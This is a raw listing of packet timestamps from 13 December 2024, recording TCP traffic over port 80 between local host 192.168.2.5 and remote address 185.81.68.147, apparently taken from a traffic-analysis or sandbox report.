                                                                                                                                                                Dec 13, 2024 01:37:36.044500113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044528008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044558048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044604063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044631958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044658899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044692039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044692993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044728994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044766903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044766903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044809103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044809103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044831991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044867039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044899940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044928074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044955969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045007944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045037985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045103073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045103073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045103073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045140028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045167923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045202017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045202017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045228004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045270920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045270920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045305014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045336008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045336008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045376062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045376062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045424938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045455933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045486927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045486927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045520067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045555115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045555115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045587063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045605898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045634031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045669079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045669079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045701027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045747042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045778990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045800924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045819998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045850039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045871973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045896053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045918941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045939922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045969009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.045995951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046026945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046055079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046073914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046103954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046143055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046143055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046188116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046188116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046235085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046235085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046279907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046312094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046361923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046391964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046454906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046545982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046545982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046574116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046613932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046643972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046679020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046679020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046709061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046740055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046802044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046802044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046843052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046873093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046873093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046899080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046922922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046956062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046956062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.046983004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047013998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047013998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047045946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047045946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047080994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047081947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047110081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047159910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047159910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047198057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047198057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047238111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047238111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047274113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047274113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047311068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047311068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047364950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047364950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047364950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047403097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047403097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047420025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047434092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047460079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047482014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047504902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047523022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047542095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047563076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047581911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047600031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047620058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047677040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047696114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047717094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047739029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047758102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047780991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047837019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047897100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047913074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047949076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.047980070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048017979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048037052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048059940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048079014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048214912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048214912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048233986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048250914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048307896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048345089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048376083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048408985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048434973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048454046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048497915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048561096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048605919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048648119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048666000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048687935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048706055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048732996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048757076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048782110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048809052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048829079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048861027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048880100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048903942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048921108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048949957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.048971891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049000978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049024105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049053907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049083948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049128056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049247026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049247026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049276114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049297094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049331903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049355030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049374104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049395084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049412012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049438953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049464941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049478054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049504995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049524069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049554110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049588919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049621105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049635887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049693108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049730062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049747944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049776077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049791098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049813032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049838066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049863100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049875975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.049901962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050034046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050034046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050034046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050050974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050091982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050091982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050132990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050148010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050235033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050235033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050235033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050235033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050257921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050265074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050292969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050343037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050358057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050384998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050399065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050451994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050467014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050496101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050510883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050539017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050558090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050575972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050601006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050623894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050657034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050683975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050714016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050733089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050759077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050779104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050803900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050826073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050839901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050865889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050896883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050923109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050937891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050966024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.050993919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051058054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051058054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051091909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051132917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051194906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051194906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051227093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051242113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051265955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051280022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051301956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051330090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051331043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051383018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051383018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051399946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051409960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051434040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051445961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051469088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051484108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051507950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051522017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051547050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051562071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051755905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051785946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051817894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051857948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051872015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051898956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051914930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051961899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051961899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.051985979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052002907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052037954 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052078009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052093983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052143097 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052151918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052185059 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052208900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052223921 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052232981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052234888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052294016 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052295923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052340031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052345037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052354097 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.052365065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052376986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052397013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.052419901 CET4977580192.168.2.5185.81.68.147
